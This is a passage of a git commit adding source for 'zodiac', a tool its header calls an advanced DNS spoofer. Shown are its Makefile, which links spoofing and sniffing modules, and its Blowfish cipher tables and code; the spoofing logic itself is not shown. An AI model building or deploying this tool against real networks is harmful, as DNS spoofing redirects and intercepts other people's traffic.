added scripts and zodiac

This commit is contained in:
Peter Baumann 2013-06-04 14:33:16 +02:00
commit 9bbbc17676
49 changed files with 9254 additions and 0 deletions

17
dns/zodiac/src/Makefile Normal file
View file

@ -0,0 +1,17 @@
CFLAGS=-Wall -g -ggdb -DDEBUG `libnet-config --defines` -D_REENTRANT -pthread
LIBS= -lncurses -lpcap -lnet
CC=gcc
OBJS = common.o cipher-blowfish.o cipher-sha1.o dns.o dns-build.o \
dns-spoof-int.o dns-spoof.o dns-tag.o dns-tools.o dnsid.o dnsq.o \
gui.o io-udp.o network.o sniff.o output.o packet.o
PREFIX=/usr/local
all: zodiac
clean:
rm -f *.o ../zodiac
zodiac: zodiac.c $(OBJS)
$(CC) $(CFLAGS) -o zodiac -static zodiac.c $(OBJS) $(LIBS)
mv zodiac ../

View file

@ -0,0 +1,282 @@
/* bf_tab.h: Blowfish P-box and S-box tables */
#ifndef _H_TAB_BF
#define _H_TAB_BF
static UWORD_32bits initbf_P[bf_N + 2] = {
0x243f6a88, 0x85a308d3, 0x13198a2e, 0x03707344,
0xa4093822, 0x299f31d0, 0x082efa98, 0xec4e6c89,
0x452821e6, 0x38d01377, 0xbe5466cf, 0x34e90c6c,
0xc0ac29b7, 0xc97c50dd, 0x3f84d5b5, 0xb5470917,
0x9216d5d9, 0x8979fb1b,
};
static UWORD_32bits initbf_S[4][256] = {
{
0xd1310ba6, 0x98dfb5ac, 0x2ffd72db, 0xd01adfb7,
0xb8e1afed, 0x6a267e96, 0xba7c9045, 0xf12c7f99,
0x24a19947, 0xb3916cf7, 0x0801f2e2, 0x858efc16,
0x636920d8, 0x71574e69, 0xa458fea3, 0xf4933d7e,
0x0d95748f, 0x728eb658, 0x718bcd58, 0x82154aee,
0x7b54a41d, 0xc25a59b5, 0x9c30d539, 0x2af26013,
0xc5d1b023, 0x286085f0, 0xca417918, 0xb8db38ef,
0x8e79dcb0, 0x603a180e, 0x6c9e0e8b, 0xb01e8a3e,
0xd71577c1, 0xbd314b27, 0x78af2fda, 0x55605c60,
0xe65525f3, 0xaa55ab94, 0x57489862, 0x63e81440,
0x55ca396a, 0x2aab10b6, 0xb4cc5c34, 0x1141e8ce,
0xa15486af, 0x7c72e993, 0xb3ee1411, 0x636fbc2a,
0x2ba9c55d, 0x741831f6, 0xce5c3e16, 0x9b87931e,
0xafd6ba33, 0x6c24cf5c, 0x7a325381, 0x28958677,
0x3b8f4898, 0x6b4bb9af, 0xc4bfe81b, 0x66282193,
0x61d809cc, 0xfb21a991, 0x487cac60, 0x5dec8032,
0xef845d5d, 0xe98575b1, 0xdc262302, 0xeb651b88,
0x23893e81, 0xd396acc5, 0x0f6d6ff3, 0x83f44239,
0x2e0b4482, 0xa4842004, 0x69c8f04a, 0x9e1f9b5e,
0x21c66842, 0xf6e96c9a, 0x670c9c61, 0xabd388f0,
0x6a51a0d2, 0xd8542f68, 0x960fa728, 0xab5133a3,
0x6eef0b6c, 0x137a3be4, 0xba3bf050, 0x7efb2a98,
0xa1f1651d, 0x39af0176, 0x66ca593e, 0x82430e88,
0x8cee8619, 0x456f9fb4, 0x7d84a5c3, 0x3b8b5ebe,
0xe06f75d8, 0x85c12073, 0x401a449f, 0x56c16aa6,
0x4ed3aa62, 0x363f7706, 0x1bfedf72, 0x429b023d,
0x37d0d724, 0xd00a1248, 0xdb0fead3, 0x49f1c09b,
0x075372c9, 0x80991b7b, 0x25d479d8, 0xf6e8def7,
0xe3fe501a, 0xb6794c3b, 0x976ce0bd, 0x04c006ba,
0xc1a94fb6, 0x409f60c4, 0x5e5c9ec2, 0x196a2463,
0x68fb6faf, 0x3e6c53b5, 0x1339b2eb, 0x3b52ec6f,
0x6dfc511f, 0x9b30952c, 0xcc814544, 0xaf5ebd09,
0xbee3d004, 0xde334afd, 0x660f2807, 0x192e4bb3,
0xc0cba857, 0x45c8740f, 0xd20b5f39, 0xb9d3fbdb,
0x5579c0bd, 0x1a60320a, 0xd6a100c6, 0x402c7279,
0x679f25fe, 0xfb1fa3cc, 0x8ea5e9f8, 0xdb3222f8,
0x3c7516df, 0xfd616b15, 0x2f501ec8, 0xad0552ab,
0x323db5fa, 0xfd238760, 0x53317b48, 0x3e00df82,
0x9e5c57bb, 0xca6f8ca0, 0x1a87562e, 0xdf1769db,
0xd542a8f6, 0x287effc3, 0xac6732c6, 0x8c4f5573,
0x695b27b0, 0xbbca58c8, 0xe1ffa35d, 0xb8f011a0,
0x10fa3d98, 0xfd2183b8, 0x4afcb56c, 0x2dd1d35b,
0x9a53e479, 0xb6f84565, 0xd28e49bc, 0x4bfb9790,
0xe1ddf2da, 0xa4cb7e33, 0x62fb1341, 0xcee4c6e8,
0xef20cada, 0x36774c01, 0xd07e9efe, 0x2bf11fb4,
0x95dbda4d, 0xae909198, 0xeaad8e71, 0x6b93d5a0,
0xd08ed1d0, 0xafc725e0, 0x8e3c5b2f, 0x8e7594b7,
0x8ff6e2fb, 0xf2122b64, 0x8888b812, 0x900df01c,
0x4fad5ea0, 0x688fc31c, 0xd1cff191, 0xb3a8c1ad,
0x2f2f2218, 0xbe0e1777, 0xea752dfe, 0x8b021fa1,
0xe5a0cc0f, 0xb56f74e8, 0x18acf3d6, 0xce89e299,
0xb4a84fe0, 0xfd13e0b7, 0x7cc43b81, 0xd2ada8d9,
0x165fa266, 0x80957705, 0x93cc7314, 0x211a1477,
0xe6ad2065, 0x77b5fa86, 0xc75442f5, 0xfb9d35cf,
0xebcdaf0c, 0x7b3e89a0, 0xd6411bd3, 0xae1e7e49,
0x00250e2d, 0x2071b35e, 0x226800bb, 0x57b8e0af,
0x2464369b, 0xf009b91e, 0x5563911d, 0x59dfa6aa,
0x78c14389, 0xd95a537f, 0x207d5ba2, 0x02e5b9c5,
0x83260376, 0x6295cfa9, 0x11c81968, 0x4e734a41,
0xb3472dca, 0x7b14a94a, 0x1b510052, 0x9a532915,
0xd60f573f, 0xbc9bc6e4, 0x2b60a476, 0x81e67400,
0x08ba6fb5, 0x571be91f, 0xf296ec6b, 0x2a0dd915,
0xb6636521, 0xe7b9f9b6, 0xff34052e, 0xc5855664,
0x53b02d5d, 0xa99f8fa1, 0x08ba4799, 0x6e85076a
},
{
0x4b7a70e9, 0xb5b32944, 0xdb75092e, 0xc4192623,
0xad6ea6b0, 0x49a7df7d, 0x9cee60b8, 0x8fedb266,
0xecaa8c71, 0x699a17ff, 0x5664526c, 0xc2b19ee1,
0x193602a5, 0x75094c29, 0xa0591340, 0xe4183a3e,
0x3f54989a, 0x5b429d65, 0x6b8fe4d6, 0x99f73fd6,
0xa1d29c07, 0xefe830f5, 0x4d2d38e6, 0xf0255dc1,
0x4cdd2086, 0x8470eb26, 0x6382e9c6, 0x021ecc5e,
0x09686b3f, 0x3ebaefc9, 0x3c971814, 0x6b6a70a1,
0x687f3584, 0x52a0e286, 0xb79c5305, 0xaa500737,
0x3e07841c, 0x7fdeae5c, 0x8e7d44ec, 0x5716f2b8,
0xb03ada37, 0xf0500c0d, 0xf01c1f04, 0x0200b3ff,
0xae0cf51a, 0x3cb574b2, 0x25837a58, 0xdc0921bd,
0xd19113f9, 0x7ca92ff6, 0x94324773, 0x22f54701,
0x3ae5e581, 0x37c2dadc, 0xc8b57634, 0x9af3dda7,
0xa9446146, 0x0fd0030e, 0xecc8c73e, 0xa4751e41,
0xe238cd99, 0x3bea0e2f, 0x3280bba1, 0x183eb331,
0x4e548b38, 0x4f6db908, 0x6f420d03, 0xf60a04bf,
0x2cb81290, 0x24977c79, 0x5679b072, 0xbcaf89af,
0xde9a771f, 0xd9930810, 0xb38bae12, 0xdccf3f2e,
0x5512721f, 0x2e6b7124, 0x501adde6, 0x9f84cd87,
0x7a584718, 0x7408da17, 0xbc9f9abc, 0xe94b7d8c,
0xec7aec3a, 0xdb851dfa, 0x63094366, 0xc464c3d2,
0xef1c1847, 0x3215d908, 0xdd433b37, 0x24c2ba16,
0x12a14d43, 0x2a65c451, 0x50940002, 0x133ae4dd,
0x71dff89e, 0x10314e55, 0x81ac77d6, 0x5f11199b,
0x043556f1, 0xd7a3c76b, 0x3c11183b, 0x5924a509,
0xf28fe6ed, 0x97f1fbfa, 0x9ebabf2c, 0x1e153c6e,
0x86e34570, 0xeae96fb1, 0x860e5e0a, 0x5a3e2ab3,
0x771fe71c, 0x4e3d06fa, 0x2965dcb9, 0x99e71d0f,
0x803e89d6, 0x5266c825, 0x2e4cc978, 0x9c10b36a,
0xc6150eba, 0x94e2ea78, 0xa5fc3c53, 0x1e0a2df4,
0xf2f74ea7, 0x361d2b3d, 0x1939260f, 0x19c27960,
0x5223a708, 0xf71312b6, 0xebadfe6e, 0xeac31f66,
0xe3bc4595, 0xa67bc883, 0xb17f37d1, 0x018cff28,
0xc332ddef, 0xbe6c5aa5, 0x65582185, 0x68ab9802,
0xeecea50f, 0xdb2f953b, 0x2aef7dad, 0x5b6e2f84,
0x1521b628, 0x29076170, 0xecdd4775, 0x619f1510,
0x13cca830, 0xeb61bd96, 0x0334fe1e, 0xaa0363cf,
0xb5735c90, 0x4c70a239, 0xd59e9e0b, 0xcbaade14,
0xeecc86bc, 0x60622ca7, 0x9cab5cab, 0xb2f3846e,
0x648b1eaf, 0x19bdf0ca, 0xa02369b9, 0x655abb50,
0x40685a32, 0x3c2ab4b3, 0x319ee9d5, 0xc021b8f7,
0x9b540b19, 0x875fa099, 0x95f7997e, 0x623d7da8,
0xf837889a, 0x97e32d77, 0x11ed935f, 0x16681281,
0x0e358829, 0xc7e61fd6, 0x96dedfa1, 0x7858ba99,
0x57f584a5, 0x1b227263, 0x9b83c3ff, 0x1ac24696,
0xcdb30aeb, 0x532e3054, 0x8fd948e4, 0x6dbc3128,
0x58ebf2ef, 0x34c6ffea, 0xfe28ed61, 0xee7c3c73,
0x5d4a14d9, 0xe864b7e3, 0x42105d14, 0x203e13e0,
0x45eee2b6, 0xa3aaabea, 0xdb6c4f15, 0xfacb4fd0,
0xc742f442, 0xef6abbb5, 0x654f3b1d, 0x41cd2105,
0xd81e799e, 0x86854dc7, 0xe44b476a, 0x3d816250,
0xcf62a1f2, 0x5b8d2646, 0xfc8883a0, 0xc1c7b6a3,
0x7f1524c3, 0x69cb7492, 0x47848a0b, 0x5692b285,
0x095bbf00, 0xad19489d, 0x1462b174, 0x23820e00,
0x58428d2a, 0x0c55f5ea, 0x1dadf43e, 0x233f7061,
0x3372f092, 0x8d937e41, 0xd65fecf1, 0x6c223bdb,
0x7cde3759, 0xcbee7460, 0x4085f2a7, 0xce77326e,
0xa6078084, 0x19f8509e, 0xe8efd855, 0x61d99735,
0xa969a7aa, 0xc50c06c2, 0x5a04abfc, 0x800bcadc,
0x9e447a2e, 0xc3453484, 0xfdd56705, 0x0e1e9ec9,
0xdb73dbd3, 0x105588cd, 0x675fda79, 0xe3674340,
0xc5c43465, 0x713e38d8, 0x3d28f89e, 0xf16dff20,
0x153e21e7, 0x8fb03d4a, 0xe6e39f2b, 0xdb83adf7
},
{
0xe93d5a68, 0x948140f7, 0xf64c261c, 0x94692934,
0x411520f7, 0x7602d4f7, 0xbcf46b2e, 0xd4a20068,
0xd4082471, 0x3320f46a, 0x43b7d4b7, 0x500061af,
0x1e39f62e, 0x97244546, 0x14214f74, 0xbf8b8840,
0x4d95fc1d, 0x96b591af, 0x70f4ddd3, 0x66a02f45,
0xbfbc09ec, 0x03bd9785, 0x7fac6dd0, 0x31cb8504,
0x96eb27b3, 0x55fd3941, 0xda2547e6, 0xabca0a9a,
0x28507825, 0x530429f4, 0x0a2c86da, 0xe9b66dfb,
0x68dc1462, 0xd7486900, 0x680ec0a4, 0x27a18dee,
0x4f3ffea2, 0xe887ad8c, 0xb58ce006, 0x7af4d6b6,
0xaace1e7c, 0xd3375fec, 0xce78a399, 0x406b2a42,
0x20fe9e35, 0xd9f385b9, 0xee39d7ab, 0x3b124e8b,
0x1dc9faf7, 0x4b6d1856, 0x26a36631, 0xeae397b2,
0x3a6efa74, 0xdd5b4332, 0x6841e7f7, 0xca7820fb,
0xfb0af54e, 0xd8feb397, 0x454056ac, 0xba489527,
0x55533a3a, 0x20838d87, 0xfe6ba9b7, 0xd096954b,
0x55a867bc, 0xa1159a58, 0xcca92963, 0x99e1db33,
0xa62a4a56, 0x3f3125f9, 0x5ef47e1c, 0x9029317c,
0xfdf8e802, 0x04272f70, 0x80bb155c, 0x05282ce3,
0x95c11548, 0xe4c66d22, 0x48c1133f, 0xc70f86dc,
0x07f9c9ee, 0x41041f0f, 0x404779a4, 0x5d886e17,
0x325f51eb, 0xd59bc0d1, 0xf2bcc18f, 0x41113564,
0x257b7834, 0x602a9c60, 0xdff8e8a3, 0x1f636c1b,
0x0e12b4c2, 0x02e1329e, 0xaf664fd1, 0xcad18115,
0x6b2395e0, 0x333e92e1, 0x3b240b62, 0xeebeb922,
0x85b2a20e, 0xe6ba0d99, 0xde720c8c, 0x2da2f728,
0xd0127845, 0x95b794fd, 0x647d0862, 0xe7ccf5f0,
0x5449a36f, 0x877d48fa, 0xc39dfd27, 0xf33e8d1e,
0x0a476341, 0x992eff74, 0x3a6f6eab, 0xf4f8fd37,
0xa812dc60, 0xa1ebddf8, 0x991be14c, 0xdb6e6b0d,
0xc67b5510, 0x6d672c37, 0x2765d43b, 0xdcd0e804,
0xf1290dc7, 0xcc00ffa3, 0xb5390f92, 0x690fed0b,
0x667b9ffb, 0xcedb7d9c, 0xa091cf0b, 0xd9155ea3,
0xbb132f88, 0x515bad24, 0x7b9479bf, 0x763bd6eb,
0x37392eb3, 0xcc115979, 0x8026e297, 0xf42e312d,
0x6842ada7, 0xc66a2b3b, 0x12754ccc, 0x782ef11c,
0x6a124237, 0xb79251e7, 0x06a1bbe6, 0x4bfb6350,
0x1a6b1018, 0x11caedfa, 0x3d25bdd8, 0xe2e1c3c9,
0x44421659, 0x0a121386, 0xd90cec6e, 0xd5abea2a,
0x64af674e, 0xda86a85f, 0xbebfe988, 0x64e4c3fe,
0x9dbc8057, 0xf0f7c086, 0x60787bf8, 0x6003604d,
0xd1fd8346, 0xf6381fb0, 0x7745ae04, 0xd736fccc,
0x83426b33, 0xf01eab71, 0xb0804187, 0x3c005e5f,
0x77a057be, 0xbde8ae24, 0x55464299, 0xbf582e61,
0x4e58f48f, 0xf2ddfda2, 0xf474ef38, 0x8789bdc2,
0x5366f9c3, 0xc8b38e74, 0xb475f255, 0x46fcd9b9,
0x7aeb2661, 0x8b1ddf84, 0x846a0e79, 0x915f95e2,
0x466e598e, 0x20b45770, 0x8cd55591, 0xc902de4c,
0xb90bace1, 0xbb8205d0, 0x11a86248, 0x7574a99e,
0xb77f19b6, 0xe0a9dc09, 0x662d09a1, 0xc4324633,
0xe85a1f02, 0x09f0be8c, 0x4a99a025, 0x1d6efe10,
0x1ab93d1d, 0x0ba5a4df, 0xa186f20f, 0x2868f169,
0xdcb7da83, 0x573906fe, 0xa1e2ce9b, 0x4fcd7f52,
0x50115e01, 0xa70683fa, 0xa002b5c4, 0x0de6d027,
0x9af88c27, 0x773f8641, 0xc3604c06, 0x61a806b5,
0xf0177a28, 0xc0f586e0, 0x006058aa, 0x30dc7d62,
0x11e69ed7, 0x2338ea63, 0x53c2dd94, 0xc2c21634,
0xbbcbee56, 0x90bcb6de, 0xebfc7da1, 0xce591d76,
0x6f05e409, 0x4b7c0188, 0x39720a3d, 0x7c927c24,
0x86e3725f, 0x724d9db9, 0x1ac15bb4, 0xd39eb8fc,
0xed545578, 0x08fca5b5, 0xd83d7cd3, 0x4dad0fc4,
0x1e50ef5e, 0xb161e6f8, 0xa28514d9, 0x6c51133c,
0x6fd5c7e7, 0x56e14ec4, 0x362abfce, 0xddc6c837,
0xd79a3234, 0x92638212, 0x670efa8e, 0x406000e0
},
{
0x3a39ce37, 0xd3faf5cf, 0xabc27737, 0x5ac52d1b,
0x5cb0679e, 0x4fa33742, 0xd3822740, 0x99bc9bbe,
0xd5118e9d, 0xbf0f7315, 0xd62d1c7e, 0xc700c47b,
0xb78c1b6b, 0x21a19045, 0xb26eb1be, 0x6a366eb4,
0x5748ab2f, 0xbc946e79, 0xc6a376d2, 0x6549c2c8,
0x530ff8ee, 0x468dde7d, 0xd5730a1d, 0x4cd04dc6,
0x2939bbdb, 0xa9ba4650, 0xac9526e8, 0xbe5ee304,
0xa1fad5f0, 0x6a2d519a, 0x63ef8ce2, 0x9a86ee22,
0xc089c2b8, 0x43242ef6, 0xa51e03aa, 0x9cf2d0a4,
0x83c061ba, 0x9be96a4d, 0x8fe51550, 0xba645bd6,
0x2826a2f9, 0xa73a3ae1, 0x4ba99586, 0xef5562e9,
0xc72fefd3, 0xf752f7da, 0x3f046f69, 0x77fa0a59,
0x80e4a915, 0x87b08601, 0x9b09e6ad, 0x3b3ee593,
0xe990fd5a, 0x9e34d797, 0x2cf0b7d9, 0x022b8b51,
0x96d5ac3a, 0x017da67d, 0xd1cf3ed6, 0x7c7d2d28,
0x1f9f25cf, 0xadf2b89b, 0x5ad6b472, 0x5a88f54c,
0xe029ac71, 0xe019a5e6, 0x47b0acfd, 0xed93fa9b,
0xe8d3c48d, 0x283b57cc, 0xf8d56629, 0x79132e28,
0x785f0191, 0xed756055, 0xf7960e44, 0xe3d35e8c,
0x15056dd4, 0x88f46dba, 0x03a16125, 0x0564f0bd,
0xc3eb9e15, 0x3c9057a2, 0x97271aec, 0xa93a072a,
0x1b3f6d9b, 0x1e6321f5, 0xf59c66fb, 0x26dcf319,
0x7533d928, 0xb155fdf5, 0x03563482, 0x8aba3cbb,
0x28517711, 0xc20ad9f8, 0xabcc5167, 0xccad925f,
0x4de81751, 0x3830dc8e, 0x379d5862, 0x9320f991,
0xea7a90c2, 0xfb3e7bce, 0x5121ce64, 0x774fbe32,
0xa8b6e37e, 0xc3293d46, 0x48de5369, 0x6413e680,
0xa2ae0810, 0xdd6db224, 0x69852dfd, 0x09072166,
0xb39a460a, 0x6445c0dd, 0x586cdecf, 0x1c20c8ae,
0x5bbef7dd, 0x1b588d40, 0xccd2017f, 0x6bb4e3bb,
0xdda26a7e, 0x3a59ff45, 0x3e350a44, 0xbcb4cdd5,
0x72eacea8, 0xfa6484bb, 0x8d6612ae, 0xbf3c6f47,
0xd29be463, 0x542f5d9e, 0xaec2771b, 0xf64e6370,
0x740e0d8d, 0xe75b1357, 0xf8721671, 0xaf537d5d,
0x4040cb08, 0x4eb4e2cc, 0x34d2466a, 0x0115af84,
0xe1b00428, 0x95983a1d, 0x06b89fb4, 0xce6ea048,
0x6f3f3b82, 0x3520ab82, 0x011a1d4b, 0x277227f8,
0x611560b1, 0xe7933fdc, 0xbb3a792b, 0x344525bd,
0xa08839e1, 0x51ce794b, 0x2f32c9b7, 0xa01fbac9,
0xe01cc87e, 0xbcc7d1f6, 0xcf0111c3, 0xa1e8aac7,
0x1a908749, 0xd44fbd9a, 0xd0dadecb, 0xd50ada38,
0x0339c32a, 0xc6913667, 0x8df9317c, 0xe0b12b4f,
0xf79e59b7, 0x43f5bb3a, 0xf2d519ff, 0x27d9459c,
0xbf97222c, 0x15e6fc2a, 0x0f91fc71, 0x9b941525,
0xfae59361, 0xceb69ceb, 0xc2a86459, 0x12baa8d1,
0xb6c1075e, 0xe3056a0c, 0x10d25065, 0xcb03a442,
0xe0ec6e0e, 0x1698db3b, 0x4c98a0be, 0x3278e964,
0x9f1f9532, 0xe0d392df, 0xd3a0342b, 0x8971f21e,
0x1b0a7441, 0x4ba3348c, 0xc5be7120, 0xc37632d8,
0xdf359f8d, 0x9b992f2e, 0xe60b6f47, 0x0fe3f11d,
0xe54cda54, 0x1edad891, 0xce6279cf, 0xcd3e7e6f,
0x1618b166, 0xfd2c1d05, 0x848fd2c5, 0xf6fb2299,
0xf523f357, 0xa6327623, 0x93a83531, 0x56cccd02,
0xacf08162, 0x5a75ebb5, 0x6e163697, 0x88d273cc,
0xde966292, 0x81b949d0, 0x4c50901b, 0x71c65614,
0xe6c6c7bd, 0x327a140a, 0x45e1d006, 0xc3f27b9a,
0xc9aa53fd, 0x62a80f00, 0xbb25bfe2, 0x35bdd2f6,
0x71126905, 0xb2040222, 0xb6cbcf7c, 0xcd769c2b,
0x53113ec0, 0x1640e3d3, 0x38abbd60, 0x2547adf0,
0xba38209c, 0xf746ce76, 0x77afa1c5, 0x20756060,
0x85cbfe4e, 0x8ae88dd8, 0x7aaaf9b0, 0x4cf9aa7e,
0x1948c25c, 0x02fb8a8c, 0x01c36ae4, 0xd6ebe1f9,
0x90d4f869, 0xa65cdea0, 0x3f09252d, 0xc208e69f,
0xb74e6132, 0xce77e25b, 0x578fdfe3, 0x3ac372e6
}
};
#endif

View file

@ -0,0 +1,304 @@
/* zodiac - advanced dns spoofer
*
* blowfish encryption routines, reference implementation
*
* by: (unknown, possible bruce schneier)
* additions by random
* slightly modified by scut
*/
#include <string.h>
#include "cipher-sha1.h"
#include "cipher-blowfish.h"
#include "cipher-blowfish-tab.h"
#include "common.h"
#define BOXES 3
/* #define S(x,i) (bf_S[i][x.w.byte##i]) */
#define S0(x) (bf_S[0][x.w.byte0])
#define S1(x) (bf_S[1][x.w.byte1])
#define S2(x) (bf_S[2][x.w.byte2])
#define S3(x) (bf_S[3][x.w.byte3])
#define bf_F(x) (((S0(x) + S1(x)) ^ S2(x)) + S3(x))
#define ROUND(a,b,n) (a.word ^= bf_F(b) ^ bf_P[n])
struct box_t {
UWORD_32bits *P;
UWORD_32bits **S;
char key[81];
char keybytes;
} box[BOXES];
static void blowfish_encipher (UWORD_32bits *xl, UWORD_32bits *xr);
static void blowfish_decipher (UWORD_32bits *xl, UWORD_32bits *xr);
static void blowfish_init (UBYTE_08bits *key, short keybytes, int bxtouse);
UWORD_32bits *bf_P;
UWORD_32bits **bf_S;
static void
blowfish_encipher (UWORD_32bits *xl, UWORD_32bits *xr)
{
union aword Xl;
union aword Xr;
Xl.word = *xl;
Xr.word = *xr;
Xl.word ^= bf_P[0];
ROUND (Xr, Xl, 1);
ROUND (Xl, Xr, 2);
ROUND (Xr, Xl, 3);
ROUND (Xl, Xr, 4);
ROUND (Xr, Xl, 5);
ROUND (Xl, Xr, 6);
ROUND (Xr, Xl, 7);
ROUND (Xl, Xr, 8);
ROUND (Xr, Xl, 9);
ROUND (Xl, Xr, 10);
ROUND (Xr, Xl, 11);
ROUND (Xl, Xr, 12);
ROUND (Xr, Xl, 13);
ROUND (Xl, Xr, 14);
ROUND (Xr, Xl, 15);
ROUND (Xl, Xr, 16);
Xr.word ^= bf_P[17];
*xr = Xl.word;
*xl = Xr.word;
}
static void
blowfish_decipher (UWORD_32bits *xl, UWORD_32bits *xr)
{
union aword Xl;
union aword Xr;
Xl.word = *xl;
Xr.word = *xr;
Xl.word ^= bf_P[17];
ROUND (Xr, Xl, 16);
ROUND (Xl, Xr, 15);
ROUND (Xr, Xl, 14);
ROUND (Xl, Xr, 13);
ROUND (Xr, Xl, 12);
ROUND (Xl, Xr, 11);
ROUND (Xr, Xl, 10);
ROUND (Xl, Xr, 9);
ROUND (Xr, Xl, 8);
ROUND (Xl, Xr, 7);
ROUND (Xr, Xl, 6);
ROUND (Xl, Xr, 5);
ROUND (Xr, Xl, 4);
ROUND (Xl, Xr, 3);
ROUND (Xr, Xl, 2);
ROUND (Xl, Xr, 1);
Xr.word ^= bf_P[0];
*xl = Xr.word;
*xr = Xl.word;
}
static void
blowfish_init (UBYTE_08bits *key, short keybytes, int bxtouse)
{
int i, j, bx;
UWORD_32bits data;
UWORD_32bits datal;
UWORD_32bits datar;
union aword temp;
for (i = 0 ; i < BOXES ; i++)
if (box[i].P != NULL) {
if ((box[i].keybytes == keybytes) &&
(strncmp ((char *) (box[i].key), (char *) key, keybytes) == 0))
{
bf_P = box[i].P;
bf_S = box[i].S;
return;
}
}
bx = (-1);
for (i = 0 ; i < BOXES ; i++) {
if (box[i].P == NULL) {
bx = i;
i = BOXES + 1;
}
}
if (bx < 0) {
bx = bxtouse;
free (box[bx].P);
for (i = 0 ; i < 4 ; i++)
free (box[bx].S[i]);
free (box[bx].S);
}
box[bx].P = (UWORD_32bits *) malloc ((bf_N + 2) * sizeof (UWORD_32bits));
box[bx].S = (UWORD_32bits **) malloc (4 * sizeof (UWORD_32bits *));
for (i = 0 ; i < 4 ; i++)
box[bx].S[i] = (UWORD_32bits *) malloc (256 * sizeof (UWORD_32bits));
bf_P = box[bx].P;
bf_S = box[bx].S;
box[bx].keybytes = keybytes;
strncpy (box[bx].key, key, keybytes);
for (i = 0 ; i < bf_N + 2 ; i++)
bf_P[i] = initbf_P[i];
for (i = 0 ; i < 4 ; i++)
for (j = 0 ; j < 256 ; j++)
bf_S[i][j] = initbf_S[i][j];
for (i = 0, j = 0; i < bf_N + 2; ++i) {
temp.word = 0;
temp.w.byte0 = key[j];
temp.w.byte1 = key[(j + 1) % keybytes];
temp.w.byte2 = key[(j + 2) % keybytes];
temp.w.byte3 = key[(j + 3) % keybytes];
data = temp.word;
bf_P[i] = bf_P[i] ^ data;
j = (j + 4) % keybytes;
}
datal = 0x00000000;
datar = 0x00000000;
for (i = 0 ; i < bf_N + 2 ; i += 2) {
blowfish_encipher (&datal, &datar);
bf_P[i] = datal;
bf_P[i + 1] = datar;
}
for (i = 0 ; i < 4 ; ++i) {
for (j = 0 ; j < 256 ; j += 2) {
blowfish_encipher(&datal, &datar);
bf_S[i][j] = datal;
bf_S[i][j + 1] = datar;
}
}
}
unsigned char *
bf_encipher (char *keyphrase, unsigned char *data, size_t data_len, size_t *result_len)
{
UWORD_32bits left, right; /* blowfish halfs */
unsigned long int dp_i; /* data pointer relative */
unsigned char key[20]; /* hash used as bf key */
unsigned char *data_enc,
*dp;
unsigned char *sp,
*source;
long int do_count;
/* build a strong hash out of a weak keyphrase
*/
SHA1Hash (keyphrase, key);
blowfish_init (key, sizeof (key), 0);
sp = source = xcalloc (1, data_len + (8 - (data_len % 8)) + 1);
memcpy (source, data, data_len);
dp = data_enc = xcalloc (1, data_len + 9);
do_count = data_len / 8;
if ((data_len % 8) != 0)
do_count += 1;
*result_len = do_count * 8;
for (dp_i = 0 ; dp_i < do_count ; ++dp_i) {
left = ((*sp++) << 24);
left |= ((*sp++) << 16);
left |= ((*sp++) << 8);
left |= (*sp++);
right = ((*sp++) << 24);
right |= ((*sp++) << 16);
right |= ((*sp++) << 8);
right |= (*sp++);
blowfish_encipher (&left, &right);
*dp++ = (right & 0xff000000) >> 24;
*dp++ = (right & 0x00ff0000) >> 16;
*dp++ = (right & 0x0000ff00) >> 8;
*dp++ = (right & 0x000000ff);
*dp++ = (left & 0xff000000) >> 24;
*dp++ = (left & 0x00ff0000) >> 16;
*dp++ = (left & 0x0000ff00) >> 8;
*dp++ = (left & 0x000000ff);
}
free (source);
return (data_enc);
}
unsigned char *
bf_decipher (char *keyphrase, unsigned char *data, size_t data_len)
{
UWORD_32bits left, right; /* blowfish halfs */
unsigned long int dp_i; /* data pointer relative */
unsigned char key[20]; /* hash used as bf key */
unsigned char *data_dec,
*dp;
unsigned char *sp;
long int do_count;
/* sanity checking
*/
if ((data_len % 8) != 0)
return (NULL);
/* build a strong hash out of a weak keyphrase
*/
SHA1Hash (keyphrase, key);
blowfish_init (key, sizeof (key), 0);
sp = data;
dp = data_dec = xcalloc (1, data_len);
do_count = data_len / 8;
for (dp_i = 0 ; dp_i < do_count ; ++dp_i) {
right = ((*sp++) << 24);
right |= ((*sp++) << 16);
right |= ((*sp++) << 8);
right |= (*sp++);
left = ((*sp++) << 24);
left |= ((*sp++) << 16);
left |= ((*sp++) << 8);
left |= (*sp++);
blowfish_decipher (&left, &right);
*dp++ = (left & 0xff000000) >> 24;
*dp++ = (left & 0x00ff0000) >> 16;
*dp++ = (left & 0x0000ff00) >> 8;
*dp++ = (left & 0x000000ff);
*dp++ = (right & 0xff000000) >> 24;
*dp++ = (right & 0x00ff0000) >> 16;
*dp++ = (right & 0x0000ff00) >> 8;
*dp++ = (right & 0x000000ff);
}
return (data_dec);
}

View file

@ -0,0 +1,93 @@
#ifndef _H_BLOWFISH
#define _H_BLOWFISH
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#define MAXKEYBYTES 56 /* 448 bits */
#define bf_N 16
#define noErr 0
#define DATAERROR -1
#define KEYBYTES 8
#define UBYTE_08bits unsigned char
#define UWORD_16bits unsigned short
#define nmalloc(x) n_malloc((x),__FILE__,__LINE__)
#define SIZEOF_INT 4
#define SIZEOF_LONG 4
#if SIZEOF_INT==4
# define UWORD_32bits unsigned int
#else
# if SIZEOF_LONG==4
# define UWORD_32bits unsigned long
# endif
#endif
/* choose a byte order for your hardware */
#ifdef WORDS_BIGENDIAN
/* ABCD - big endian - motorola */
union aword {
UWORD_32bits word;
UBYTE_08bits byte[4];
struct {
unsigned int byte0:8;
unsigned int byte1:8;
unsigned int byte2:8;
unsigned int byte3:8;
} w;
};
#endif /* WORDS_BIGENDIAN */
#ifndef WORDS_BIGENDIAN
/* DCBA - little endian - intel */
union aword {
UWORD_32bits word;
UBYTE_08bits byte[4];
struct {
unsigned int byte3:8;
unsigned int byte2:8;
unsigned int byte1:8;
unsigned int byte0:8;
} w;
};
#endif /* !WORDS_BIGENDIAN */
/* bf_encipher
*
* safely encrypt a sequenced byte block pointed to by `data' with length
* `data_len'. as encryption key a hash build out of an asciiz string
* `keyphrase' is used. the length of the resulting data block is
* stored in the variable pointed to by `result_len'.
*
* return a pointer to a new allocated encrypted data block
*/
unsigned char *bf_encipher (char *keyphrase, unsigned char *data,
size_t data_len, size_t *result_len);
/* bf_decipher
*
* decrypt a blowfish encrypted data block pointed to by `data'. as key use a
* hash value build out of the asciiz string `keyphrase'. the data block is
* `data_len' bytes in length and must be padded to an 8 byte boundary.
*
* return NULL on failure (boundary error)
